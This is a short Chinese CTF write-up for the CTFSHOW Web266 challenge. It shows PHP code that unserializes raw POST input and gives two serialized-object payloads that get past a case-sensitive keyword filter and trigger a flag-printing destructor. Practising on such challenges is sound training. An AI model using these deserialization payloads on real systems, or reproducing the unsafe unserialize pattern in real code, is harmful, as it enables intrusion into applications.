首页 > 其他分享 >CTFSHOW Web266

CTFSHOW Web266

时间:2022-08-29 08:56:03浏览次数:206  
标签:__ function Web266 username ctfshow cs public CTFSHOW

highlight_file(__FILE__);

include('flag.php');
$cs = file_get_contents('php://input');


class ctfshow{
public $username='xxxxxx';
public $password='xxxxxx';
public function __construct($u,$p){
$this->username=$u;
$this->password=$p;
}
public function login(){
return $this->username===$this->password;
}
public function __toString(){
return $this->username;
}
public function __destruct(){
global $flag;
echo $flag;
}
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
throw new Exception("Error $ctfshowo",1);
}
我们这里有两种解法,第一种解法利用“PHP对类名的大小写不敏感”,POST提交参数O:7:"Ctfshow":2:{}

第二种解法利用破坏反序列化结构,这个需要记住即可,POST提交参数O:7:"ctfshow":2:{ctfshow}

 

标签:__,function,Web266,username,ctfshow,cs,public,CTFSHOW
From: https://www.cnblogs.com/meng-han/p/16634718.html

相关文章

  • ctfshow 萌新web系列--4
    <html><head><title>ctf.show萌新计划web1</title><metacharset="utf-8"></head><body><?php#包含数据库连接文件include("config.php");#判断get提......
  • ctfshow 萌新web系列--3
    <html><head><title>ctf.show萌新计划web1</title><metacharset="utf-8"></head><body><?php#包含数据库连接文件include("config.php");#判断get提......
  • CTFSHOW Web259 SoapClient原生类的反序列化
      index.php   看到该题目第一眼,大脑直接一个简单的想法就是通过访问flag.php添加X-Forwarded-For然后POST发送token数据。但!在本题的环境当中,由于使用了Clou......
  • ctfshow 萌新web系列--2
    <html><head><title>ctf.show萌新计划web1</title><metacharset="utf-8"></head><body><?php#包含数据库连接文件include("config.php");#判断get提......
  • ctfshow 萌新web系列--1
    打开靶机 <html><head><title>ctf.show萌新计划web1</title><metacharset="utf-8"></head><body><?php#包含数据库连接文件include("config.php");......